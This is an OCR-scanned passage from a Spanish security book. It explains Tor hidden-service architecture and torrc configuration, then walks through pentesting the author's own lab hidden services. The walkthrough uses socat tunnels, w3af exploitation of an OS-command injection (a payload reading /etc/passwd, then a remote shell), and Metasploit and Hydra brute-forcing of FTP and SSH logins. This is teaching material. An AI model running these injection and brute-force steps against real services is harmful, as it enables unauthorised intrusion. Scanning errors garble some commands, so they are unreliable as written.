de Tor, es que esta pensada para que tanto clientes como servicios sean mutuamente anonimos, esto 
se consigue gracias a la implementation de varios circuitos y elementos intermedios que impiden que 
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la comunicacion entre clientes y servicios se realice de forma directa. Para entender el mecanismo 
completo de comunicacion entre clientes y servicios ocultos, se explicara detalladamente, paso a 
paso, cada una de las etapas de instalacion del servicio y posterior conexion por parte de un cliente. 

4.2.4.1 Instalacion y configuracion de un servicio oculto 

En primer lugar, un servicio oculto puede ser de cualquier tipo, un servidor HTTP, FTP, SSH, 
SAMBA, etc. Se trata de servicios comunes que fiincionan utilizando la red de Tor para el envio y 
recepcion de paquetes, el unico requisito obligatorio es que dichos servicios utilicen protocolo TCP. 
Evidentemente para seguir hablando de anonimato y privacidad tanto en el servicio como para sus 
clientes, la ubicacion de ambas partes debe ser desconocida y para ello, se siguen los siguientes 
pasos a la hora de instalar, configurar y acceder a un servicio oculto. 

Paso 1 

El servicio necesita estar disponible en la red de Tor para que los usuarios puedan utilizarlo y para 
ello, lo primero que hace es seleccionar tres repetidores en la red de Tor de forma aleatoria y construir 
un circuito hacia ellos, esto quiere decir que el servicio no establece una conexion directa con dichos 
repetidores, conservando el anonimato del servicio de cara a dichos repetidores seleccionados. Estos 
repetidores en la terminologia de Tor son conocidos como “Puntos Introductorios” (“Introduction 
Points”) y son los encargados de recibir las peticiones de los clientes y enrutarlas por medio del 
circuito hacia al servicio oculto. Posteriormente, el servicio oculto se encarga de enviar su clave 
publica a cada uno de los “Introduction Points ”, la cual sera utilizada para que cada “Introduction 
Point ” pueda asociar dicha clave publica con el servicio. 



Imogen 04.04: Seleccion de "Introduction Points "por parte del servicio. (imagen tomada de torproject.org) 

Paso 2 

Hasta este punto solamente se seleccionan repetidores de forma aleatoria, se crean circuitos para 
comunicarse con dichas maquinas y se les envla la clave publica del servicio. El servicio oculto debe 
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estar disponible a los clientes y para ello debe registrar su informacion basica en la red de Tor y de 
esta forma los clientes podran acceder a dicho servicio. 

El servidor debe conformar un fichero conocido como “ Hidden Service Descriptor ” (HSD) que no 
es mas que un fichero que contiene la direccion “onion” del servicio, su clave publica y el listado 
de Introduction Points ” seleccionados en el paso anterior. Este descriptor es enviado a la base de 
datos distribuida de Tor tambien conocida como “DistributedHash Table” (DHT) la cual se encarga 
de registrar el servicio y de procesar las peticiones de los clientes y esta compuesta por multiples 
instancias de Tor que tienen la flag “HSDir”. 

Para el envlo de fichero a la DHT de Tor, el servicio oculto crea un circuito al “ HSDir ” correspondiente 
para conservar su anonimato, de tal forma que ni siquiera las instancias que actiian como “HSDir" 
conocer la ubicacion exacta de ninguno de los servicios ocultos que se registran. 



Imogen 04.05: Creadon y publicacion del Hidden Service Descriptor (HSD). (imagen tornado de torproject.org) 
Paso 3 

El servicio esta disponible y ahora cualquier usuario podra acceder a el. No obstante, el cliente tiene 
que conocer la direccion “onion” de ese servicio antes de poder consultarlo a la DHT. Asumiendo 
que el cliente dispone de dicha direccion “ onion”, crea un circuito contra la DHT para conservar su 
anonimato y de esta forma, ninguno de los servidores con flag “HSDir" conoce la ubicacion exacta 
de un usuario que visita un servicio oculto. 

A continuacion el cliente obtiene el HSD correspondiente a la direccion “onion" consultada, 
obteniendo de esta forma todo lo necesario para establecer una comunicacion con el servicio oculto. 
En el caso de que dicha direccion se encuentre registrada, el cliente obtendra la clave publica del 
servicio y el listado de los repetidores que actuan como “ Introduction Point ” para contactar con 
el servicio oculto. El documento que devuelven las autoridades de directorio se conoce como 
“Rendezvous Service Descriptor”. 
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T6f Hidden Services: 3 


Q 



Step 3: Alice hears that 
XYZ,onion exists, and she 
requests more Info from 
the database. She also 
sets 


JL Ik Tor circuit 

iriroducbon points 
C3 Public key 
.cookie . One-time secret 
Rendezvous point 


Alice 


Imagen 04.06: Consulta del clienle a la DHTpara obtener el HSD del servicio oculto partiendo de su direccion '.onion "y 
crea un circnito contra un Rendezvous Point, (imagen lomada de torproject.org) 


Paso 4 


Ahora que el cliente tiene todo lo que necesita para conectarse con el servicio oculto, debe encargarse 
de crear un circuito a uno de los “Introduction Point ”, el cual sera seleccionado por el cliente de 
forma aleatoria y se encargara de enviar las peticiones del cliente al servicio oculto. Sin embargo, 
antes de esto, el cliente debe seleccionar de forma aleatoria un repetidor en la red que actuara como 
“Rendezvous Point ” o “Punto de encuentro”, el cual como su nombre lo indica, sera el lugar de 
encuentro en el que finalmente tanto el cliente como el servicio podran comunicarse. 


f jf Hidden Services: 4 
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Imagen 04.07: El cliente crea y envia el “Introduce Message" al servicio oculto. (imagen tomada de torproject.org) 


































Capitulo IV. Tor (The Onion Router) 


167 


Como se puede apreciar en la imagen 04.07 el cliente crea un circuito contra el Rendezvous Point y 
posteriormente, el punto de encuentro genera un “Owe Time Secret ’ (OTS) para identificar de forma 
unica el circuito establecido entre el punto de encuentro y el cliente. Para mas informacion sobre el 

fnncionamiento de los OTS, ver: http://searchsecurity.techtarget.com/definition/one-time-pad 


Paso 5 

El cliente crea un paquete de datos en donde se incluye la direccion del Rendezvous Point y 
el OTS generado en el paso anterior. A continuation, utiliza el circuito creado contra uno de los 
“introduction Points ” y envia dicho paquete de datos, el cual se encontrara cifrado con la clave 
publica del servicio oculto para que ninguna de las maquinas por las que pasa el mensaje pueda ver 
el contenido. Dicho paquete de datos se conoce como “ Introduce Message y es el encargado de 
informar al servicio oculto los detalles necesarios para establecer la comunicacion con el cliente. 


T6f 



Hidden Services: 5 


Tor cloud 
Tor circuit 

^23 Introduction points 


Step 5: Bob connects to 
the Alice’s rendezvous 
point and provides her 
one-time secret. 


Imagen 04.08: Cliente y servicio se comunican por medio del Rendezvous Point . 


Paso 6 

En este paso final, el servicio ahora conoce la ubicacion del “ Rendezvous Poinf y el OTS, asi que 
a continuacion el servicio crea un circuito contra dicho punto de encuentro y envia un paquete 
que incluye el OTS. El “ Rendezvous Poinf \ al recibir el paquete de datos y verificar el OTS es 
capaz de relacionarlo con el circuito creado por el cliente y a continuacion envia un mensaje por 
dicho circuito indicando que el servicio oculto ha respondido al " Introduce Message enviado por 
el cliente y a partir de este punto, el cliente y el servicio utilizaran el punto de encuentro para 
intercambiar informacion. 

Hay que tener en cuenta que dicha conexion no sera directa, tanto cliente como servicio utilizaran 
los circuitos creados previamente contra el punto de encuentro para conservar su anonimato. El 
esquema se resume en una comunicacion en la que el cliente y el servicio oculto se comunican por 
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medio de un punto de encuentro y a su vez, dicho punto de encuentro desconoce la ubicacion real del 
cliente o del servicio. Como consecuencia de este modelo, para que un cliente se pueda comunicar 
con un servicio oculto en la web profunda de Tor, tienen que existir dos circuitos, uno para conectar 
el cliente con el punto de encuentro y otro para conectar el servicio con el punto de encuentro, por 
este motivo y la complejidad intrinseca del protocolo “ Rendezvous ” de Tor, el rendimiento de las 
conexiones que se realizan contra cualquier servicio oculto suele ser bastante pobre. 

Opciones de configuration para servicios ocultos 

Una vez comprendidos los conceptos basicos sobre el funcionamiento de los servicios ocultos en 
Tor, ahora es importante comprender como se puede configurar un servicio oculto en una instancia de 
Tor. El procedimiento no es complejo, solamente es necesario utilizar las opciones de configuration 
adecuadas y entender el efecto que producen. Para poder establecer un servicio oculto, en primer 
lugar se debe instalar, configurar e iniciar correctamente cualquier tipo de servicio basado en TCP, 
por ejemplo un servidor HTTP, SSH, FTP, SMB, etc. Dicho servidor puede encontrarse en la misma 
maquina donde se ejecuta la instancia de Tor o en otra que sea accesible desde dicha instancia, lo 
mas habitual es iniciar el servidor en la misma maquina donde se ejecuta la instancia de Tor. A 
continuation, se debe editar el fichero de configuration “ torrc ” y establecer las propiedades con sus 
correspondientes valores. En este caso concreto, las opciones de configuration necesarias para crear 
un servicio oculto en la web profunda de Tor son: “ HiddenServiceDir" y “HiddenServicePort". 

HiddenServiceDir 

Esta directiva permite establecer el directorio en el que se almacenara la clave privada del servicio 
y la direccion “.onion" que se calcula a partir de dicha clave privada. La direction “.onion" debe 
ser distribuida a aquellos clientes a los que se destina el servicio y se compone por una cadena de 
texto con exactamente 16 caracteres, en donde solamente se admiten las letras entre la “a” y “z" 
en minusculas y los digitos entre el 2 y 7. Estas condiciones vienen definidas por el algoritmo 
Base32, el cual es utilizado por la instancia de Tor para calcular todas las direcciones “.onion" de 
cualquier servicio oculto. Este directorio sera creado automaticamente por la instancia de Tor en el 
caso de que no exista y en caso contrario, intentara leer los ficheros “ hostname" y “privatejcey" 
ya que asume que si el directorio se encuentra creado, es posible que el servicio oculto se haya 
configurado anteriormente y en este nuevo arranque de la instancia de Tor, simplemente se debe 
utilizar la configuracion creada previamente. Esto quiere decir que la clave privada generada por una 
instancia de Tor la primera vez que se ejecuta es de vital importancia y puede ser utilizada en otras 
instancias de Tor que pueden estar ubicadas en otros ordenadores. 

HiddenServicePort 

Con esta directiva de configuracion es posible especificar el puerto que se abrira en la web profunda 
de Tor y que estara vinculado con la direccion “.onion" que se ha generado con la propiedad 
“HiddenServiceDir". Esto quiere decir que el uso de esta propiedad depende de “HiddenServiceDir" 
para que surta el efecto esperado. Por otro lado, esta directiva permite crear un tunel entre la web 
profunda de Tor y una interfaz de red con un puerto que puede apuntar o bien a la maquina local 
o cualquier otra ubicacion accesible por la instancia. En dicho puerto debe existir un servicio que 
pueda procesar las peticiones entrantes, como por ejemplo un servidor HTTP, SSH, FTP, etcetera. Es 
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importante recordar que dicho servicio debe funcionar sobre el protocolo TCP. La forma en la que se 
debe utilizar esta option de configuracion en el fichero “ torn:” es la siguiente: 

HiddenServicePort 22 127.0.0.1:2222 

El primer argumento de la directiva es el valor “22”, que corresponde al puerto que se vinculara 
con la direccion “.onion” generada automaticamente por la propiedad “ HiddenServiceDir”. 
Posteriormente, se indica el “endpoint” de las peticiones realizadas contra la direccion “.onion” en 
el puerto “22”, que en este caso concreto, seran redireccionadas a la maquina donde se ejecuta la 
instancia (“127.0.0.1”) en el puerto “2222”. Evidentemente, para que el servicio oculto funcione 
correctamente, es necesario tener un proceso en ejecucion que se encuentre vinculado con el puerto 
“2222” y que este correctamente configurado para aceptar y responder a peticiones realizadas por 
los clientes. 

Con el uso de estas dos opciones de configuracion es suficiente para indicarle a la instancia que 
debe crear un servicio oculto. Cabe anotar que el uso de ambas opciones es obligatorio y sus valores 
deben establecerse correctamente. 

HiddenServiceDir /home/adastra/hidden_service_SSH/ 

HiddenServicePort 22 127.0.0.1:2222 

En el caso de utilizar las opciones de configuracion que se indican mas arriba, se creara el directorio 
“/ home/adastra/hidden_service_SSH ” y en el, se incluiran los ficheros “ hostname ” y “private_key” 
del servicio oculto. Posteriormente, todas las peticiones entrantes a la direccion “.onion” generada 
en el fichero “ hostname ” por el puerto “22”, seran enrutadas automaticamente a la maquina local en 
el puerto “2222”. 

4.2.4.2 Pentesting contra servicios ocultos 

Llegados a este punto, queda claro que los servicios ocultos en Tor se registran en la red y cada 
registro se incluye en una base de datos hash distribuida (DHT) que se compone por el HSD ( Hidden 
Service Descriptor ) del servicio y su correspondiente direccion “.onion”, la cual estara compuesta 
por letras entre la “a” y la “z” en minusculas y los numeros entre 2 y 7. Este valor se genera al 
aplicar el algoritmo Base32 sobre el hash SHA de la clave privada del servicio oculto. Se trata de 
un funcionamiento que es transparente para los usuarios, los cuales lo unico que necesitan conocer 
es la direccion “.onion” del servicio al que quieren acceder y es justo en este punto donde reside la 
verdadera dificultad de atacar servicios ocultos en Tor, ya que depende de su disponibilidad y que en 
algunos casos, solamente unos pocos usuarios tienen conocimiento de las direcciones que se utilizan 
para prestar un servicio especifico. 

Por ejemplo, suponiendo que existe un grupo de delincuentes que necesitan transferir documentos 
e informacion entre ellos y operan en distintos paises, solamente ese grupo reducido de usuarios 
conocen la direccion del servicio que utilizaran para intercambiar informacion y adicionalmente, 
dicho servicio puede estar disponible en una ffanja horaria determinada y el resto del tiempo puede 
encontrarse inactivo. Esta situation limita las probabilidades de que el servicio sea encontrado por 
cualquier otro usuario en la red de Tor y evidentemente hace que sea practicamente imposible de 
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atacar. No obstante, si el pentester conoce la direccion “.onion” del servicio, las cosas cambian 
radicaknente, ya que es posible utilizar las herramientas de pentesting habituates para auditar 
cualquier servicio en Internet. Es posible usar Metasploit Framework, W3 AF, OpenVAS, NeXpose, 
Nikto, Nmap, etc. Lo unico que necesita el pentester es conocer la direccion “.onion” del servicio 
que se debe auditar y a continuacion, levantar una instancia de Tor con su correspondiente servidor 
proxy SOCKS. 

El mecanismo es muy sencillo, basta con crear un tunel que permita conectar el servicio oculto con 
un puerto arbitrario en la maquina local utilizando el proxy SOCKS levantado por la instancia de Tor 
y a partir de este punto, se puede ejecutar las herramientas anteriormente mencionadas o cualquier 
otra contra un puerto en la maquina local. Es tan facil como suena y no requiere de configuraciones 
especiales. A continuacion se explicara el procedimiento para realizar pruebas de pentesting contra 
servicios habituales en la red de Tor. 

4.2.4.2.1 Pentesting contra un servicio oculto HTTP 

En este caso, para demostrar el uso de algunas herramientas de pentesting contra un servicio oculto 
vulnerable en la web profunda de Tor, se procede a arrancar una aplicacion web con multiples 
vulnerabilidades que utiliza el equipo de W3AF para realizar pruebas, dicha aplicacion web 
vulnerable es conocida como “ Django-moth ” y se encuentra disponible en el siguiente repositorio 
de Github: https://github.com/andresriancho/django-moth 

Para poder iniciarla es necesario tener Python y Django instalados en el sistema y a continuacion 
ejecutar el siguiente comando desde el directorio raiz de la aplicacion. 

>python manage runserver 8080 

En este caso concreto, el puerto utilizado para arrancar la aplicacion web sera el “8080”, con lo cual 
el servicio oculto debe estar debidamente configurado para enrutar todas las peticiones entrantes 
por un puerto en la web profunda de Tor, hacia el puerto “8080” de la maquina donde se encuentra 
en ejecucion “Django-moth”. Partiendo de la explication dada en parrafos anteriores sobre las 
directivas necesarias para la creation de servicios ocultos en una instancia de Tor, los siguientes 
valores en el fichero “ torrc ” podrian ser suficientes. 

HiddenServiceDir /home/adastra/Escritorio/hidden_service_HTTP/ 

HiddenServicePort 80 127.0.0.1:8080 

Ahora que el servicio vulnerable se encuentra iniciado y es accesible en la web profunda de Tor, 
es posible atacar dicho servicio de la misma forma en la que es posible atacar cualquier aplicacion 
o servidor web en Internet utilizando herramientas de pentesting comunes. En este caso, emplear 
herramientas de reconocimiento para aplicaciones web puede ser un buen inicio, como por ejemplo 
Nikto o scripts NSE de Nmap. No obstante, antes de hacerlo es necesario aplicar algun mecanismo 
para acceder al servicio oculto en la web profunda de Tor utilizando dichas herramientas. Para hacer 
esto, pueden aplicarse dos enfoques, o bien la herramienta que se va a utilizar soporta el enrutamiento 
de peticiones por medio de un proxy SOCKS o crear un tunel transparente que permita enrutar todas 
las peticiones al servicio oculto utilizando el proxy SOCKS levantado por una instancia de Tor. 
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La segunda altemativa resulta ser la mas fiable, ya que no hay que aplicar ningun tipo de configuracion 
adicional para que las herramientas funcionen correctamente, todo se hace de forma transparente 
por medio del proxy SOCKS de la instancia de Tor. Para crear un tunel con estas caracteristicas 
puede haber varias altemativas, una de ellas es creando un tunel SSH y habilitando el soporte para 
servidores proxy del tipo SOCKS, algo bastante comun en implementaciones como OpenSSH. 
Utilizando un proxy transparente con librerias como Twisted en Python o utilizando directamente 
una herramienta como Socat. Dado que utilizar Socat es comodo, facil y fiable, se trata sin duda de 
una de las mejores altemativas para conseguir el objetivo planteado. Suponiendo que la direction 
del servicio oculto que se desea atacar es “fieqd7c21jyyo54f.onion” y el puerto del servidor proxy 
SOCKS es “9150”, el comando que se ejecutaria para crear el tunel seria el siguiente. 

>socat TCP4-LISTEN: 7000, reuseaddr, fork SOCKS4A: 127.0.0.1 :fieqd7c21 jyyo54f. 
onion:80,socksport=9150 

El comando anterior abrira el puerto “7000” en la maquina local y utilizara el puerto 9150 para 
enrutar todas las peticiones entrantes por el puerto “7000” al servicio oculto en el puerto 80. Esto se 
traduce a que se puede utilizar cualquier herramienta de pentesting web estableciendo como objetivo 
la maquina local en el puerto “7000” y SOCAT se encargara de redirigir todas peticiones realizadas 
contra dicho puerto al servicio oculto definido. Ademas de enrutar las peticiones desde el cliente 
hacia el servicio oculto, otra de las caracteristicas que tiene SOCAT es que los tuneles creados con 
esta herramienta son bidireccionales, es decir, que no solamente es capaz de enrutar las peticiones 
a su correspondiente destino, sino que tambien es capaz de transmitir las respuestas que emite el 
servidor. A partir de aqui, realizar un proceso de pentesting contra el servicio oculto es una labor con 
la que probablemente el lector se sentira mucho mas comodo. 

adastra@Galilei:-S socat TCP4-LISTEN:7000,reuseaddr,fork S0CKS4A:127.0.0.1:fiecd7c21]yyo54f.onion: 

50,sockspo rt=9150 


adastra@Galilei:/adastraData/AdastraRealm/Hacking/webHacking/nikto- 2.1.5$ ./nikto .pi -h http: //127 
.0.0.1:7000 
- Nikto V2.1.5 


t- Target IP: 127.0.0.1 
h Target Hostname: localhost 
f Target Port: 7000 

f Start Time: 2015-05-31 19:20:52 (GMT2) 


i- Server: WSGIServer/0.1 Python/2.7.3 

h Retrieved x-powered-by header: PHP/5.1.2-l+bl ubuntu 

t- The anti-clickjacking X-Frame-Options header is not present. 

- STATUS: Completed 60 tests (-1% complete, 1.2 hours left: currently in plugin 'Content Search') 


Imogen 04.09: Nikto contra un servicio oculto del tipo HTTP. 


Dado que en este caso concreto el servicio oculto es la aplicacion web vulnerable “Django-moth”, 
una buena forma de atacarlo es utilizando W3AF. 

>./w3af_console 

w3af»> plugins audit os_commanding 

w3af»> target set target http://localhost:7000/audit/os_commanding/param_osc. 

py?param=-la 

w3af»> start 

OS Commanding was found at: "http://localhost:7000/audit/os commanding/param osc. 
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py&#8221;, using HTTP method GET. The sent data was: "param=%7C%2Fbin%2Fcat%20 
%2Fetc%2Fpasswd" The modified parameter was "param". This vulnerability was found 
in the request with id 39. 

Scan finished in 14 seconds. 

Stopping the core... 


Como se puede apreciar, se ha encontrado una vulnerabilidad y se ha registrado en el “Knowledge 
Base ” de W3 AF. A continuacion, se puede intentar explotar dicha vulnerabilidad utilizando el plugin 
“os commanding”. 


adastra@Galilei:~S socat TCP4-LISTEN:7600.reuseaddr,fork S0CKS4A:127.0.0.1:fieqd7c2ljyyo54f.onion: 
30,sockspo rt=9150 


• i 

v3af>» kb list vulns 


Vulnerability | Description 


OS commanding | OS Commanding was found at: 

vulnerability | "http://localhost:7000/audit/os commanding/pa ram osc.py". using HTTP method 
| GET. The sent data was: "param=%26%26%2Fbin%2Fcat%20%2Fetc%2Fpasswd" The 
j modified parameter was "param". This vulnerability was found in the request 
| with id 37. 


v3af»> exploit exploit os_commanding 
ds_ commanding exploit plugin is starting. 

Vulnerability successfully exploited. Generated shell object <os_commanding object (ruser: "adastr 
a" | rsystem: "Linux debiantesting 3.2.0-4-486 i686 GNU/Linux“)> 

Vulnerability successfully exploited. This is a list of available shells and proxies: 

- [0] <os commanding object (ruser: "adastra" | rsystem: "Linux debiantesting 3.2.0-4-486 i686 GNU 
/Linux")> 

Hease use the interact command to interact with the shell objects. 
v3af»> | 


Imogen 04.10: Explolacion “OS Commanding" en un servicio oculto con W3AF. 


Se ha generado una consola contra el servicio oculto utilizando W3AF. A partir de este punto, el 
atacante podra ejecutar comandos directamente contra el servicio oculto vulnerable y evidentemente 
comprometer su anonimato. 


adastra@Galilei:-$ socat TCP4-LISTEN:7000,reuseaddr,fork S0CKS4A:127.0.0.1:fieqd7c2ljyyo54f.onion 
50,socksport=9150 


v3af>» exploit interact 0 
Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the 
oscommanding shell. 
v3af/exploit/os commanding-0»> e w 
12:38:48 up 1:07, 3 users, load average: 0,00 

JSER TTY FROM LOGIN@ IDLE 


adastra tty7 
adastra pts/1 
adastra pts/0 


11:32 

11:41 

11:40 


1:07m 

57:04 

57:28 


0 . 01 , 

JCPU 

8.42s 

53.35s 


), 05 

PCPU WHAT 

0.08s gdm-session-wor 
0.01s w 


38.78s 38.66s tor -f torrc 


*/3af/exploit/os commanding-0»> e uname -a 

_inux debiantesting 3.2.0-4-486 #1 Debian 3.2.63-2+deb7ul i686 GNU/Linux 

v3af/exploit/os_commanding-0>» e id 
jid=lO00(adastra) gid=1000(adastra) grupos=1000(adastra),24(cdrom),25(floppy),29(audio),30(dip),44 
(video),46(plugdev),106(scanner),111(bluetooth),113(netdev) 

v3af/exploit/os commanding-0»> 


Imogen 04.11: Ejecucion de comandos contra el servicio oculto vulnerable. 
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En este caso se ha atacado un servicio oculto del tipo HTTP, pero tal como se ha mencionado 
anteriormente en este documento, en la web profunda de Tor existen toda clase de servicios, los 
cuales pueden estar mal configurados o ser vulnerables. Siguiendo los mismos conceptos expuestos 
en el ejemplo anterior, en las siguientes secciones se explicara como ejecutar pruebas de pentesting 
contra otros tipos de servicios ocultos. 

4.2A.2.2 Pentesting contra un servicio oculto FTP 

Existen muchas implementaciones del protocolo FTP tanto desde el lado del cliente como desde el 
lado del servidor y tambien, han sido muchas las vulnerabilidades que se han encontrado y explotado 
en dichas implementaciones. Si un servidor FTP vulnerable se expone en la web profunda de Tor, 
es probable que pueda seguir siendo utilizado sin mayores problemas en el caso de que solamente 
un grupo reducido de usuarios conozca su direccion ''.onion" y no pretendan vulnerarlo, pero si un 
atacante descubre dicha direccion no tardara demasiado en hacerse con el control del servicio. 

Las directivas utilizadas para crear un servicio FTP no son diferentes a las de cualquier otro tipo de 
servicio oculto, lo unico que probablemente cambiara sera el puerto y el directorio. Por ejemplo: 

HiddenServiceDir /home/adastra/Escritorio/hidden_service_ftp/ 

HiddenServicePort 21 127.0.0.1:21 

Las lineas anteriores se incluiran en el fichero “torrc” y en la maquina donde se levanta la instancia 
de Tor, debera existir un proceso vinculado al puerto “21”. La direccion “. onion ” generada tambien 
respondera unicamente a las peticiones entrantes por el puerto “21”. 

Nuevamente se puede utilizar SOCAT para crear un tunel entre el servicio oculto y la maquina del 
atacante, pero evidentemente es necesario que en la maquina del atacante se levante una instancia 
de Tor que tenga la propiedad SOCKSPort establecida para poder utilizar un proxy SOCKS que 
permita el acceso a la web profunda de Tor y conseguir llegar al servicio oculto. 

>socat TCP4-LISTEN:8000,reuseaddr,fork SOCKS4A:127.0.0.1:ondsyq4v4xcr6ct6. 
onion:21,socksport=9150 

El puerto que se abrira en la maquina del atacante sera el “8000” y cualquier peticion que 
llegue a dicho puerto, sera automaticamente enrutada al servicio oculto en el puerto “21” cuya 
direccion “. onion ” es “ondsyq4v4xcr6ct6”. Evidentemente para que dicho enrutamiento funcione 
correctamente se debe establecer el proxy SOCKS, que en este caso es el puerto “9150”, puerto por 
defecto que utiliza Tor Browser. 

Con todos los elementos dispuestos, se puede utilizar cualquier herramienta para realizar pruebas 
de penetration contra el servicio oculto, no obstante antes de hacer nada, es mejor comprobar que el 
tunel funciona correctamente y para ello, basta con realizar una peticion al servidor FTP utilizando 
cualquier cliente de dicho protocolo. 

adast ra@Gali.lei: ~$ socat TCP4 - LISTEN: 8G00, reuseadd r, f o rk S0CKS4A: 127.0.0.1: ondsyq4v4xc r6ct6. onion: 
21,socksport=9150 


Imogen 04.12: Conexion contra un servicio oculto FTP utilizando Socat (l a parte). 
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adastra@Gatilei:~$ ftp 127.0.0.1 8000 
Connected to 127.0.0.1. 

220 debiantesting FTP server (Version 6.4/OpenBSD/Linux-ftpd-0.17) ready. 

'lame (127.0.0.l:adastra): adastra 
331 Password required for adastra. 

Password: 

230- 

230- The programs included with the Debian GNU/Linux system are free software; 
230- the exact distribution terms for each program are described in the 
230- individual files in /usr/share/doc/Vcopyright. 

230- 

230- Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
230- permitted by applicable law. 

230 User adastra logged in. 
demote system type is UNIX. 

Using binary mode to transfer files. 
ftp> i 


Imogen 04.12: Conexion contra un servicio oculto FTP utilizando Socat (2°parte). 


Despues de verificar que la conexion se puede establecer, es el momento de utilizar una herramienta 
corao Metasploit Framework para realizar pruebas automatizadas utilizando los modulos auxiliares 
que se encuentran incluidos en el framework. 


adastra@Galilei:-$ socat TCP4-LISTEN:8S00,reuseaddr,fork S0CKS4A:127.0.e.l:ondsyq4v4xcr6ct6.onion: 
21,socksport=9150 

?T--- -■'-L. . L r L. -1-.. , - t Tlr , - 

msf > setg RHOSTS 127.0.0.1 
RHOSTS => 127.0.0.1 
msf > setg RPORT 8000 
RPORT => 8000 

msf > use auxiliary/scanner/ftp/ftplogin 
msf auxiliary(ftplogin) > set USERNAME adastra 
USERNAME => adastra 

msf auxiliary(ftp_login) > set PASSFILE /home/adastra/Escritorio/passwords 
PASSFILE => /home/adastra/Escritorio/passwords 
nsf auxiliary(ftp_login) > run 

[*] 127,0.0.1:8000 - Starting FTP login sweep 

[!] No active DB -- Credential data will not be saved! 

(-] 127.0.0.1:8000 FTP - LOGIN FAILED: adastra:root (Incorrect: ) 

I-] 127.0.0.1:8000 FTP - LOGIN FAILED: adastra:admin (Incorrect: ) 

[-] 127.0.0.1:8000 FTP - LOGIN FAILED: adastra:qwerty (Incorrect: ) 

{-] 127.0.0.1:8000 FTP - LOGIN FAILED: adastra:1234567 (Incorrect: ) 

[-] 127.0.0.1:8000 FTP - LOGIN FAILED: adastra:adastra (Incorrect: ) 

[+] 127.0.0.1:8000 - LOGIN SUCCESSFUL: adastra:adastral23 
[*] Scanned 1 of 1 hosts (100% complete) 

[*] Auxiliary module execution completed 
msf auxiliary(ftp_login) > | 


Imogen 04.13: Metasploit Framework contra un servicio oculto FTP. 


4.2.4.2.3 Pentesting contra un servicio oculto SSH 

SSH es un protocolo bastante conocido y utilizado por practicamente todos los administradores de 
sistemas y tambien es un protocolo muy utilizado en la web profunda de Tor. No es sencillo encontrar 
direcciones onion ” con este tipo de servicios, pero hay bastantes y a veces no se encuentran 
debidamente configurados. Como se ha mencionado anteriormente, la principal dificultad a la hora 
de atacar los servicios ocultos en Tor es que es dificil encontrar la direction “.onion” de un servicio a 
atacar y mas aun cuando se trata de servicios cuyas funciones son principalmente de administration, 
como es el caso de cualquier servicio SSH. 

Normalmente estas direcciones “.onion” solamente las conocen aquellas personas que crean el 
servicio oculto y que intentan administrar servidores de forma anonima. Sin embargo, una vez se 
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descubre la direccion del servicio oculto en cuestion, nuevamente basta con crear un tunel cuyo 
endpoint sera el servicio oculto y a continuacion realizar pruebas de pentesting con las herramientas 
habituales. Suponiendo que la direccion del servicio oculto SSH a atacar es klebohg2zv pit , 
la si-uiente imagen ensefia la forma en la que se debe crear el tunel con SOCAT y como utilizar el 
cliente SSH en sistemas Linux ( openssh-client ) para realizar la conexion contra el servicio ocu to. 

adastra@Galilei:~£ socat TCP4-LISTEN:6000, reuseaddr.fork S0CKS4A:12/.B.U.i: 

22,socksport=9150 


adastra@Galilei:-$ ssh -p 6600 adastra@127.0.0.1 
adastra@127.0.0.1's password: 

Linux debiantesting 3.2.0-4-486 * *1 Debian 3.2.63-2+deb7ul 1686 

The programs included with the Debian GNU/Linux system are free software; 
the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 

Jebian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
permitted by applicable law. 
fou have new mail. 

_ast login: Sat May 30 18:13:22 2015 from localhost 

jid= 1000 ^adast ra)'"gid=1806(adastra) grupos=lOO0(adastra>,24(cdrom).25(floppy),29(audio),30(di P ),44 

(video),46jplugdev),106(scanner),lll(bluetooth),113(netdev) 

adastragdebiantesting:-$ | ___ 

Imagen 04.14: Conexion contra un servicio oculto SSH utilizando Socat. 

Despues de verificar que el servicio se encuentra activo y que el tunel funciona correctamente a la 
hora de enrutar las peticiones adecuadamente, se puede realizar un proceso de pentesting basico 
utilizando Metasploit Framework. 

*?^£5H!^KTEn! 60^ S0CKS4A = 127.0.0.1: klebohg2zv4b5 j 5u. onion: 

22 , socksport=9150 _ 

ikf auxiliary(ssh login) > set SToToITsuCCESS true 

STOP ON SUCCESS => true 

nsf auxiliary!sshlogin) > set USERNAME adastra 
ikfrname => adastra 

msl auxiliary!ssh_login) > set PASS_FILE /home/adastra/Escritorio/passwords 
PASSFILE => /home/adastra/Escritorio/passwords 
msf auxiliary(ssh_login) > run 

[*] 127.0.0.1:6000 SSH - Starting bruteforce 
r.] 127.0.0.1:6000 SSH - Failed: 'adastra:root' 

[!] No active DB -- Credential data will not be saved! 

127.0.0.1:6000 SSH - Failed: 'adastra:admin' 

;.j 127.0.0.1:6000 SSH - Failed: 'adastra:qwerty' 

[-) 127 0 0-1:6000 SSH - Failed: 'adastra:1234567' 

[;} 127 0 0 1-6060 SSH ■- Success:'^adastra^adastral23' ' uid= 1000 <adastra, gid= 1000 ,adastra) gruposl 
Il000 (adastra), 24 (cdrom), 25 (floppy), 29(audio). 30(dip) ,44(video),46 (ptugdev). ^< s «nner), Ul(i 

0 

[*] Scanned 1 of 1 hosts (100% complete) 

[*] Auxiliary module execution completed 
msf auxiliary(ssh_login) - 


Imagen 


04.15: Metasploit Framework contra un servicio oculto SSH. 


Ademas de utilizar MSF tambien se pueden utilizar otras herramientas comunes, como por ejemplo 
THC Hydra. 
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adast ra@Galilei:~$ socat TCP4-LISTEN:6009,reuseadd r,fo rk S0CKS4A:127.0.0.1:kleb0hg2zv4b5] 5u.onion: 
22,socksport=9150 

adastra@Galilei:/adastraData/AdastraRealm/Hacking/passwordCracking/thc-hydra$ ./hydra -1 adastra - 
P /home/adastra/Escritorio/passwords ssh://127.0.0.1:6000 

Hydra v8.2-dev (c) 2014 by van Hauser/THC - Please do not use in military or secret service organi 
zations, or for illegal purposes. 

Hydra (http://www.thc.org/thc-hydra) starting at 2015-06-01 01:19:40 

[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce 
the tasks: use -t 4 

[DATA] max 7 tasks per 1 server, overall 64 tasks, 7 login tries (1:1/p:7), -0 tries per task 
[DATA] attacking service ssh on port 6000 

[6080][ssh] host: 127.0.0.1 login: adastra password: adastral23 

1 of 1 target successfully completed, 1 valid password found 

